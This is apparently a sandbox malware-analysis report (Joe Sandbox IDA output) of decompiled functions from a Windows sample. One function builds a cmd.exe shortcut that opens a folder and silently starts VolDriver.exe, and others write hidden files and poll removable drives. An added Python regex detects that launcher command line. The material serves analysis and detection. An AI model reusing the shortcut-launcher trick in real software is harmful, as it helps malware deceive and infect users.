                                                                                  • API ID: ExchangeInterlockedhtonsmemcpysendto
                                                                                  • String ID: pdu
                                                                                  • API String ID: 2164660128-2320407122
                                                                                  • Opcode ID: ad203699c0f73e1d20fa981d9dd844b3e240f33b07fa194a24806bbeb4069567
                                                                                  • Instruction ID: d66807eb1e7b0d5154e21252e4693ec0aa38c6c5b5b9df1ad79a440d19662bd5
                                                                                  • Opcode Fuzzy Hash: ad203699c0f73e1d20fa981d9dd844b3e240f33b07fa194a24806bbeb4069567
                                                                                  • Instruction Fuzzy Hash: 8B31F2362043119FC710DF69D880A9BB7E4AFC9714F04497EF99897381DA7489198BEB
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 54%
                                                                                  			E00404980(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                  				intOrPtr _v8;
                                                                                  				void* _v12;
                                                                                  				void* _v16;
                                                                                  				short _v540;
                                                                                  				char* _t37;
                                                                                  				intOrPtr _t42;
                                                                                  
                                                                                  				__imp__CoInitialize(0);
                                                                                  				_t37 =  &_v12;
                                                                                  				__imp__CoCreateInstance(0x410348, 0, 1, 0x410338, _t37);
                                                                                  				_v8 = _t37;
                                                                                  				if(_v8 >= 0 && _v12 != 0) {
                                                                                  					wsprintfW( &_v540, L"/c start .\\%s & start .\\%s\\VolDriver.exe", 0x4140cc, 0x4140cc);
                                                                                  					 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x50))))(_v12, L"%windir%\\System32\\cmd.exe");
                                                                                  					_t42 =  *_v12;
                                                                                  					_t13 = _t42 + 0x44; // 0xffed0c85
                                                                                  					 *((intOrPtr*)( *_t13))(_v12, _a8, _a12);
                                                                                  					 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x3c))))(_v12, 7);
                                                                                  					 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x2c))))(_v12,  &_v540);
                                                                                  					_v8 =  *((intOrPtr*)( *((intOrPtr*)( *_v12))))(_v12, 0x410358,  &_v16);
                                                                                  					if(_v8 >= 0 && _v16 != 0) {
                                                                                  						 *((intOrPtr*)( *((intOrPtr*)( *_v16 + 0x18))))(_v16, _a4, 1);
                                                                                  						 *((intOrPtr*)( *((intOrPtr*)( *_v16 + 8))))(_v16);
                                                                                  					}
                                                                                  					return  *((intOrPtr*)( *((intOrPtr*)( *_v12 + 8))))(_v12);
                                                                                  				}
                                                                                  				return _t37;
                                                                                  			}

                                                                                  APIs
                                                                                  • CoInitialize.OLE32(00000000), ref: 0040498B
                                                                                  • CoCreateInstance.OLE32(00410348,00000000,00000001,00410338,?), ref: 004049A3
                                                                                  • wsprintfW.USER32 ref: 004049D6
                                                                                  Strings
                                                                                  • /c start .\%s & start .\%s\VolDriver.exe, xrefs: 004049CA
                                                                                  • %windir%\System32\cmd.exe, xrefs: 004049DF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateInitializeInstancewsprintf
                                                                                  • String ID: %windir%\System32\cmd.exe$/c start .\%s & start .\%s\VolDriver.exe
                                                                                  • API String ID: 2038452267-2473591295
                                                                                  • Opcode ID: 340fd1f3452e10be6b46804f1b08d5f979aa4967310c1d27f755dd35910e8895
                                                                                  • Instruction ID: 67ce22acd86be46554e689b187cabead6fbc8e336e1921382d0bb77877987f96
                                                                                  • Opcode Fuzzy Hash: 340fd1f3452e10be6b46804f1b08d5f979aa4967310c1d27f755dd35910e8895
                                                                                  • Instruction Fuzzy Hash: F431BA75A40208EFCB04DF98C885EDEB7B5EF88704F108299E619A73A5D774AE81CB54
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%
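Added hunting example (not code from the report or from the sample): the wsprintfW format string listed above, /c start .\%s & start .\%s\VolDriver.exe, yields a cmd.exe command line in which the same directory name fills both %s slots, and %windir%\System32\cmd.exe normally expands to C:\Windows\System32\cmd.exe. The Python below matches that exact shape in process-creation records, accepting a quoted or unquoted cmd.exe image (or the bare argument string) and insisting that the two directory names agree, so a look-alike with different names is not flagged. The record layout (dicts with pid, image and cmdline), the directory names and the events themselves are constructed for this example.

```python
import re
from typing import Optional

# Pattern derived from the format string in the listing above:
#   /c start .\%s & start .\%s\VolDriver.exe
# The optional leading group accepts "cmd.exe", a full (quoted or unquoted)
# image path, or the unexpanded %windir% form; the backreference (?P=dir)
# requires the same directory name in both positions.
_PATTERN = re.compile(
    r'^(?:"?[^"]*?cmd\.exe"?\s+)?'                         # optional cmd.exe image
    r'/c\s+start\s+\.\\(?P<dir>[^\s&\\]+)'                 # first %s: directory to open
    r'\s*&\s*start\s+\.\\(?P=dir)\\VolDriver\.exe\s*$',    # second %s: same name, then VolDriver.exe
    re.IGNORECASE,
)


def match_voldriver_launcher(cmdline: str) -> Optional[str]:
    """Return the directory name when cmdline has the launcher shape, else None."""
    m = _PATTERN.match(cmdline.strip())
    return m.group("dir") if m else None


def scan_process_events(events: list) -> list:
    """Filter process-creation records whose command line matches.

    Each record is a dict with at least a 'cmdline' key (field names are an
    assumption of this example); every hit is returned with the extracted
    directory name added under 'dir'.
    """
    hits = []
    for ev in events:
        directory = match_voldriver_launcher(ev.get("cmdline", ""))
        if directory is not None:
            hits.append({**ev, "dir": directory})
    return hits


# Constructed sample records, not taken from the sandbox run.
SAMPLE_EVENTS = [
    {"pid": 4120, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c start .\_ & start .\_\VolDriver.exe'},
    {"pid": 4188, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"%windir%\System32\cmd.exe /c start .\Backup & start .\Backup\VolDriver.exe"},
    # Near miss: the two directory names differ, so this must not be flagged.
    {"pid": 4200, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c start .\a & start .\b\VolDriver.exe'},
    {"pid": 4212, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c dir"},
]


if __name__ == "__main__":
    for hit in scan_process_events(SAMPLE_EVENTS):
        print(f"pid {hit['pid']}: launcher for directory '{hit['dir']}' -> {hit['cmdline']}")
```

The directory name is returned rather than just a boolean so that a responder can go straight to the <drive root>\<dir>\VolDriver.exe path the command line points at; matching on the whole shape, including the repeated name, keeps the rule from firing on ordinary "start" invocations.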

                                                                                  C-Code - Quality: 100%
                                                                                  			E004099A0(void* __eax) {
                                                                                  				void* _v8;
                                                                                  				long _v12;
                                                                                  				void* _v16;
                                                                                  				signed int _v20;
                                                                                  				long _v24;
                                                                                  				signed int _t36;
                                                                                  				void* _t38;
                                                                                  				signed int _t65;
                                                                                  
                                                                                   				// 0x414e84 holds the entry count of the pointer table at 0x414e88; nothing is written when it is empty.
                                                                                   				if( *0x414e84 == 0) {
                                                                                   					return __eax;
                                                                                   				}
                                                                                   				_t36 =  *0x414e84; // 0x0
                                                                                   				_v12 = _t36 << 3; // 8 bytes of output per entry
                                                                                   				_t38 = E00408E60(_v12); // presumably the heap allocator matching E00408FB0 (a HeapFree wrapper, see E0040E0A0 below)
                                                                                   				_v8 = _t38;
                                                                                   				__eflags = _v8;
                                                                                   				if(_v8 != 0) {
                                                                                   					_v20 = 0;
                                                                                   					while(1) {
                                                                                   						__eflags = _v20 -  *0x414e84; // 0x0
                                                                                   						if(__eflags >= 0) {
                                                                                   							break;
                                                                                   						}
                                                                                   						// copy the DWORDs at +4 and +8 of each table entry into the output buffer
                                                                                   						 *((intOrPtr*)(_v8 + _v20 * 8)) =  *((intOrPtr*)( *((intOrPtr*)(0x414e88 + _v20 * 4)) + 4));
                                                                                   						 *((intOrPtr*)(_v8 + 4 + _v20 * 8)) =  *((intOrPtr*)( *((intOrPtr*)(0x414e88 + _v20 * 4)) + 8));
                                                                                   						_t65 = _v20 + 1;
                                                                                   						__eflags = _t65;
                                                                                   						_v20 = _t65;
                                                                                   					}
                                                                                   					// CreateFileW(path at 0x414c40, GENERIC_WRITE, no sharing, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_HIDDEN, NULL):
                                                                                   					// the output file is created with the hidden attribute.
                                                                                   					_v16 = CreateFileW(0x414c40, 0x40000000, 0, 0, 2, 2, 0);
                                                                                   					__eflags = _v16 - 0xffffffff;
                                                                                   					if(_v16 != 0xffffffff) { // INVALID_HANDLE_VALUE
                                                                                   						WriteFile(_v16, _v8, _v12,  &_v24, 0);
                                                                                   						FlushFileBuffers(_v16);
                                                                                   						CloseHandle(_v16);
                                                                                   					}
                                                                                   					InterlockedExchange(0x4133b4, 0x3d); // set the global state flag at 0x4133b4 to 0x3d
                                                                                   					return E00408FB0(_v8);
                                                                                   				}
                                                                                   				return _t38;
                                                                                   			}

                                                                                   Instruction addresses: 0x004099ad 0x00000000 0x00000000 0x004099b4 0x004099bc 0x004099c3 0x004099cb 0x004099ce 0x004099d2 0x004099d8 0x004099ea 0x004099ed 0x004099f3 0x00000000 0x00000000 0x00409a08 0x00409a1e 0x004099e4 0x004099e4 0x004099e7 0x004099e7 0x00409a3e 0x00409a41 0x00409a45 0x00409a59 0x00409a63 0x00409a6d 0x00409a6d 0x00409a7a 0x00000000 0x00409a89 0x00409a8f

                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(00414C40,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00409A38
                                                                                  • WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 00409A59
                                                                                  • FlushFileBuffers.KERNEL32(000000FF), ref: 00409A63
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 00409A6D
                                                                                  • InterlockedExchange.KERNEL32(004133B4,0000003D), ref: 00409A7A
                                                                                   Memory Dump Source
                                                                                   • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                   • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                   • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                   Joe Sandbox IDA Plugin
                                                                                   • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
                                                                                  • String ID:
                                                                                  • API String ID: 442028454-0
                                                                                  • Opcode ID: 041b73d5b942429564a4579fd955c60e5901b8d3da01b6d0c2a702c2e683ff31
                                                                                  • Instruction ID: 85340a07573b5f562dbc2fb3f1b8785e1f65b23dd5aeba6ef7127c009f103e88
                                                                                  • Opcode Fuzzy Hash: 041b73d5b942429564a4579fd955c60e5901b8d3da01b6d0c2a702c2e683ff31
                                                                                  • Instruction Fuzzy Hash: A6317AB8A00209EBCB14CF94ED45FAEB3B5FB88300F208169E511A7391D774AE41CF58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 46%
                                                                                  			E004078B0(signed int __edx, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24) {
                                                                                  				signed int _v8;
                                                                                  				signed int _v12;
                                                                                  
                                                                                   				// L0040F19E is the CRT 64-bit shift helper _allshl (see the API ID below); at 46% decompilation
                                                                                   				// quality the OR-chain below is only a best-effort rendering of the six shifted arguments.
                                                                                   				asm("cdq");
                                                                                   				L0040F19E();
                                                                                  				asm("cdq");
                                                                                  				L0040F19E();
                                                                                  				asm("cdq");
                                                                                  				L0040F19E();
                                                                                  				asm("cdq");
                                                                                  				L0040F19E();
                                                                                  				asm("cdq");
                                                                                  				L0040F19E();
                                                                                  				asm("cdq");
                                                                                  				_v12 = _a4 | _a8 | _a12 | _a16 | _a20 | _a24;
                                                                                  				_v8 = __edx | __edx | __edx | __edx | __edx | __edx;
                                                                                  				return _v12;
                                                                                  			}

                                                                                   Instruction addresses: 0x004078bb 0x004078be 0x004078ca 0x004078cd 0x004078d9 0x004078dc 0x004078e8 0x004078eb 0x004078f7 0x004078fa 0x00407906 0x0040790b 0x0040790e 0x0040791c

                                                                                   Memory Dump Source
                                                                                   • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                   • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                   • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                   Joe Sandbox IDA Plugin
                                                                                   • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Similarity
                                                                                  • API ID: _allshl
                                                                                  • String ID:
                                                                                  • API String ID: 435966717-0
                                                                                  • Opcode ID: 1cbd3f30f7551ee80999496264fe97a3fccce00ee31e34d742f1e9c4e4257bfe
                                                                                  • Instruction ID: 50bcbbfbc9b263382ea6c403a771187ef31099e9fa81d89d9fbd392b00d1843e
                                                                                  • Opcode Fuzzy Hash: 1cbd3f30f7551ee80999496264fe97a3fccce00ee31e34d742f1e9c4e4257bfe
                                                                                  • Instruction Fuzzy Hash: CDF08132A01028EB8720EEEFC4428CAF7E69F88364B118136F818E7660E9709C1547F2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E0040E0A0(intOrPtr* __ebx, void* __edi) {
                                                                                  				void* _t8;
                                                                                  				intOrPtr* _t18;
                                                                                  				intOrPtr _t23;
                                                                                  				intOrPtr _t26;
                                                                                  				void* _t28;
                                                                                  
                                                                                   				_t18 = __ebx;
                                                                                   				// 0x756470 is the little-endian bytes 'p','d','u',0: the "pdu" magic that tags this structure
                                                                                   				if(__ebx != 0 &&  *__ebx == 0x756470) {
                                                                                   					SetEvent( *(__ebx + 0x10)); // signal the event at +0x10 ...
                                                                                   					WaitForSingleObject( *(__ebx + 0x14), 0xffffffff); // ... then wait (INFINITE) on the handle at +0x14 until it completes
                                                                                   					CloseHandle( *(__ebx + 0x14));
                                                                                   					_t26 =  *((intOrPtr*)(__ebx + 0x20)); // head of a singly linked list
                                                                                   					if(_t26 == 0) {
                                                                                   						L6:
                                                                                   						E00409940( *((intOrPtr*)(_t18 + 8)));
                                                                                   						return E00408FB0(_t18); // HeapFree wrapper (see the subcall note below)
                                                                                   					}
                                                                                   					do {
                                                                                   						E00408FB0( *((intOrPtr*)(_t26 + 0x18))); // free the node's payload at +0x18
                                                                                   						_t23 =  *((intOrPtr*)(_t26 + 0x1c)); // next pointer at +0x1c
                                                                                   						E00408FB0(_t26); // free the node itself
                                                                                   						_t28 = _t28 + 8; // stack cleanup after the two cdecl calls (decompiler artifact)
                                                                                   						_t26 = _t23;
                                                                                   					} while (_t23 != 0);
                                                                                   					goto L6;
                                                                                   				}
                                                                                   				return _t8;
                                                                                  			}

                                                                                   Instruction addresses: 0x0040e0a0 0x0040e0a2 0x0040e0b1 0x0040e0bd 0x0040e0c7 0x0040e0cd 0x0040e0d2 0x0040e0f1 0x0040e0f5 0x00000000 0x0040e103 0x0040e0d5 0x0040e0d9 0x0040e0de 0x0040e0e2 0x0040e0e7 0x0040e0ea 0x0040e0ec 0x00000000 0x0040e0f0 0x0040e104

                                                                                  APIs
                                                                                  • SetEvent.KERNEL32(?,00009E34,0040DD0D), ref: 0040E0B1
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040E0BD
                                                                                  • CloseHandle.KERNEL32(?), ref: 0040E0C7
                                                                                    • Part of subcall function 00408FB0: HeapFree.KERNEL32(00000000,00000000,00401192,?,00401192,?), ref: 0040900B
                                                                                   Memory Dump Source
                                                                                   • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                   • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                   • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                   Joe Sandbox IDA Plugin
                                                                                   • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseEventFreeHandleHeapObjectSingleWait
                                                                                  • String ID: pdu
                                                                                  • API String ID: 309973729-2320407122
                                                                                  • Opcode ID: 66e9fe8601b7ef7cd0dbcf15949e6a0ec0c00c685c3ab46f0f111c3b43d568d8
                                                                                  • Instruction ID: f8868823fc7079781ad89b5054c4351009e6be9a29e70cb83faf709a4bea03a0
                                                                                  • Opcode Fuzzy Hash: 66e9fe8601b7ef7cd0dbcf15949e6a0ec0c00c685c3ab46f0f111c3b43d568d8
                                                                                  • Instruction Fuzzy Hash: 7FF0C2B64002209BCB209F66EC84D577779AE843203044A7EFD516B38ACE78EC51C7A9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E004047E0(WCHAR* _a4) {
                                                                                  				int _v8;
                                                                                  				short _v1052;
                                                                                  				intOrPtr _v1056;
                                                                                  
                                                                                   				_v8 = GetDriveTypeW(_a4);
                                                                                   				_v1056 = _v8;
                                                                                   				// Only DRIVE_REMOVABLE (2), DRIVE_FIXED (3) and DRIVE_RAMDISK (6) are examined further.
                                                                                   				if(_v1056 >= 2) {
                                                                                   					if(_v1056 <= 3 || _v1056 == 6) {
                                                                                   						// QueryDosDeviceW resolves the drive letter to its NT target (buffer of 0x208 WCHARs).
                                                                                   						// A target beginning with "\??\" is a Win32 path mapping (e.g. a subst drive) rather than a
                                                                                   						// \Device\... volume; such a drive is reported as 1 (DRIVE_NO_ROOT_DIR), presumably so the
                                                                                   						// caller treats it like a nonexistent drive.
                                                                                   						if(QueryDosDeviceW(_a4,  &_v1052, 0x208) != 0 && StrCmpNW( &_v1052, L"\\??\\", 4) == 0) {
                                                                                   							_v8 = 1;
                                                                                   						}
                                                                                   					}
                                                                                   				}
                                                                                   				return _v8;
                                                                                  			}

                                                                                   Instruction addresses: 0x004047f3 0x004047f9 0x00404806 0x0040480f 0x00404834 0x0040484e 0x0040484e 0x00404834 0x0040480f 0x0040485b

                                                                                  APIs
                                                                                  • GetDriveTypeW.KERNEL32(0040489F), ref: 004047ED
                                                                                  • QueryDosDeviceW.KERNEL32(0040489F,?,00000208), ref: 0040482C
                                                                                  • StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 00404844
                                                                                   Memory Dump Source
                                                                                   • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                   • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                   • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                   Joe Sandbox IDA Plugin
                                                                                   • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Similarity
                                                                                  • API ID: DeviceDriveQueryType
                                                                                  • String ID: \??\
                                                                                  • API String ID: 1681518211-3047946824
                                                                                  • Opcode ID: 2b4ad6813e30ca617d8286429adeb6bd2046491341813551861da181f93699b6
                                                                                  • Instruction ID: 5abcc523fc43e3b538995df9ae9ab9c5832e94dc02c2deabd9e765cd8bb00b71
                                                                                  • Opcode Fuzzy Hash: 2b4ad6813e30ca617d8286429adeb6bd2046491341813551861da181f93699b6
                                                                                  • Instruction Fuzzy Hash: 2D01FFB594020CEBCF20EF95CD497D977B8AB44704F00C4BAAB18A7290D6799AC5CF98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E0040D530(char _a4) {
                                                                                  				long _v8;
                                                                                  				void* _v12;
                                                                                  
                                                                                  				_v8 = 0;
                                                                                  				_t2 =  &_a4; // 0x4050e0
                                                                                  				_v12 = CreateFileW( *_t2, 0x80000000, 1, 0, 3, 0, 0);
                                                                                  				if(_v12 != 0xffffffff) {
                                                                                  					_v8 = GetFileSize(_v12, 0);
                                                                                  					CloseHandle(_v12);
                                                                                  				}
                                                                                  				return _v8;
                                                                                  			}





                                                                                  0x0040d536
                                                                                  0x0040d54c
                                                                                  0x0040d556
                                                                                  0x0040d55d
                                                                                  0x0040d56b
                                                                                  0x0040d572
                                                                                  0x0040d572
                                                                                  0x0040d57e

                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(P@,80000000,00000001,00000000,00000003,00000000,00000000,004050E0), ref: 0040D550
                                                                                  • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040D565
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040D572
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CloseCreateHandleSize
                                                                                  • String ID: P@
                                                                                  • API String ID: 1378416451-676759640
                                                                                  • Opcode ID: bc44828a6da30a9cad1c5fe3b81ddf2eba58198aecc4cfa5820a2fec73a274a6
                                                                                  • Instruction ID: ef73fbcfdb561ef279eb64d7b78e57dedde01b6ae7d936de3e3fbaf211c6e608
                                                                                  • Opcode Fuzzy Hash: bc44828a6da30a9cad1c5fe3b81ddf2eba58198aecc4cfa5820a2fec73a274a6
                                                                                  • Instruction Fuzzy Hash: A5F01C74A40308FBDB20DFA4DC49F9D7BB4AB08711F208294FA447B2C0D6B56A808B48
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 64%
                                                                                  			E0040DE70(char* __edx, intOrPtr _a4) {
                                                                                  				short _v18;
                                                                                  				short _v22;
                                                                                  				short _v26;
                                                                                  				short _v28;
                                                                                  				short _v30;
                                                                                  				char _v32;
                                                                                  				char _v36;
                                                                                  				intOrPtr _v40;
                                                                                  				intOrPtr _v44;
                                                                                  				char _v56;
                                                                                  				intOrPtr _v68;
                                                                                  				char* _t23;
                                                                                  				short _t26;
                                                                                  				long _t29;
                                                                                  				short _t34;
                                                                                  				intOrPtr _t37;
                                                                                  				intOrPtr _t43;
                                                                                  				long _t47;
                                                                                  				signed int _t48;
                                                                                  				void* _t50;
                                                                                  
                                                                                  				_t40 = __edx;
                                                                                  				_t50 = (_t48 & 0xfffffff8) - 0x1c;
                                                                                  				_t34 = 0;
                                                                                  				_t43 = _a4;
                                                                                  				_v28 = 0;
                                                                                  				do {
                                                                                  					_t23 =  &_v32;
                                                                                  					_v32 = 0;
                                                                                  					__imp__#10( *(_t43 + 8), 0x4004667f, _t23);
                                                                                  					if(_t23 == 0xffffffff) {
                                                                                  						break;
                                                                                  					}
                                                                                  					_t37 = _v44;
                                                                                  					if(_t37 != 0) {
                                                                                  						if(_t34 == 0 || _v40 < _t37) {
                                                                                  							_v40 = _t37;
                                                                                  							_t26 = E00408EA0(_t37, _t40, _t34, _t37);
                                                                                  							_t37 = _v44;
                                                                                  							_t50 = _t50 + 8;
                                                                                  							_t34 = _t26;
                                                                                  						}
                                                                                  						_v30 = 0;
                                                                                  						_v26 = 0;
                                                                                  						_v22 = 0;
                                                                                  						_v18 = 0;
                                                                                  						_t29 =  *(_t43 + 8);
                                                                                  						_v32 = 0;
                                                                                  						_t40 =  &_v32;
                                                                                  						_v36 = 0x10;
                                                                                  						__imp__#17(_t29, _t34, _t37, 0,  &_v32,  &_v36);
                                                                                  						_t47 = _t29;
                                                                                  						if(_t47 != 0xffffffff && _t47 != 0) {
                                                                                  							InterlockedExchangeAdd(_t43 + 0x18, _t47);
                                                                                  							_t40 =  &_v56;
                                                                                  							E0040DD40(_t43, _t34, _t47, _v68,  &_v56);
                                                                                  							_t50 = _t50 + 0x14;
                                                                                  						}
                                                                                  					}
                                                                                  				} while (WaitForSingleObject( *(_t43 + 0x10), 1) == 0x102);
                                                                                  				return E00408FB0(_t34);
                                                                                  			}























                                                                                  0x0040de70
                                                                                  0x0040de76
                                                                                  0x0040de7b
                                                                                  0x0040de7e
                                                                                  0x0040de81
                                                                                  0x0040de85
                                                                                  0x0040de88
                                                                                  0x0040de93
                                                                                  0x0040de9b
                                                                                  0x0040dea4
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040deaa
                                                                                  0x0040deb0
                                                                                  0x0040deb8
                                                                                  0x0040dec2
                                                                                  0x0040dec6
                                                                                  0x0040decb
                                                                                  0x0040decf
                                                                                  0x0040ded2
                                                                                  0x0040ded2
                                                                                  0x0040ded8
                                                                                  0x0040dedc
                                                                                  0x0040dee0
                                                                                  0x0040dee4
                                                                                  0x0040deee
                                                                                  0x0040def1
                                                                                  0x0040def6
                                                                                  0x0040df00
                                                                                  0x0040df08
                                                                                  0x0040df0e
                                                                                  0x0040df13
                                                                                  0x0040df1e
                                                                                  0x0040df28
                                                                                  0x0040df31
                                                                                  0x0040df36
                                                                                  0x0040df36
                                                                                  0x0040df13
                                                                                  0x0040df45
                                                                                  0x0040df5f

                                                                                  APIs
                                                                                  • ioctlsocket.WS2_32 ref: 0040DE9B
                                                                                  • recvfrom.WS2_32 ref: 0040DF08
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040DF1E
                                                                                  • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040DF3F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
                                                                                  • String ID:
                                                                                  • API String ID: 3980219359-0
                                                                                  • Opcode ID: 417089ecdd77fb733dbf3dacbd9a690ae54b466f088ab91cb1b16bb4ccf47cfd
                                                                                  • Instruction ID: 6c80b279ed5ca581be7c80171f6d45ff8cd2583a00b65cb27f0af65c826a2fd4
                                                                                  • Opcode Fuzzy Hash: 417089ecdd77fb733dbf3dacbd9a690ae54b466f088ab91cb1b16bb4ccf47cfd
                                                                                  • Instruction Fuzzy Hash: 252181B1504301AFD304DF65D884A6BB7E9EFD4314F008A3EF859D2280E774D9488BAA
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 29%
                                                                                  			E0040EDD0(char _a4) {
                                                                                  				long _v4;
                                                                                  				struct _OVERLAPPED* _v8;
                                                                                  				long _v12;
                                                                                  				void* __ebx;
                                                                                  				signed int _t31;
                                                                                  				signed int _t32;
                                                                                  				signed int _t36;
                                                                                  				struct _OVERLAPPED* _t38;
                                                                                  				long _t43;
                                                                                  				char _t51;
                                                                                  				struct _OVERLAPPED* _t52;
                                                                                  				long* _t54;
                                                                                  
                                                                                  				_t54 =  &_v12;
                                                                                  				_t51 = _a4;
                                                                                  				_t52 = 0;
                                                                                  				_v4 = 0;
                                                                                  				_v12 = 0;
                                                                                  				_v8 = 0;
                                                                                  				_t31 = GetQueuedCompletionStatus( *(_t51 + 8),  &_v4,  &_v12,  &_v8, 0xffffffff);
                                                                                  				_t43 = _v12;
                                                                                  				_t32 = _t31 & 0xffffff00 | _t31 != 0x00000000;
                                                                                  				if(_t43 == 0) {
                                                                                  					return _t32;
                                                                                  				}
                                                                                  				do {
                                                                                  					if(_t32 == 0) {
                                                                                  						_t38 =  *((intOrPtr*)(_t43 + 0x260));
                                                                                  						__imp__WSAGetOverlappedResult(_t38, _v8,  &_v4, 0,  &_a4);
                                                                                  						if(_t38 == 0) {
                                                                                  							__imp__#111();
                                                                                  							_t52 = _t38;
                                                                                  						}
                                                                                  					}
                                                                                  					_push(_t52);
                                                                                  					E0040EBE0(_v8, _v4, _v12);
                                                                                  					_t54 =  &(_t54[1]);
                                                                                  					_t52 = 0;
                                                                                  					_v4 = 0;
                                                                                  					_v12 = 0;
                                                                                  					_v8 = 0;
                                                                                  					_t36 = GetQueuedCompletionStatus( *(_t51 + 8),  &_v4,  &_v12,  &_v8, 0xffffffff);
                                                                                  					_t43 = _v12;
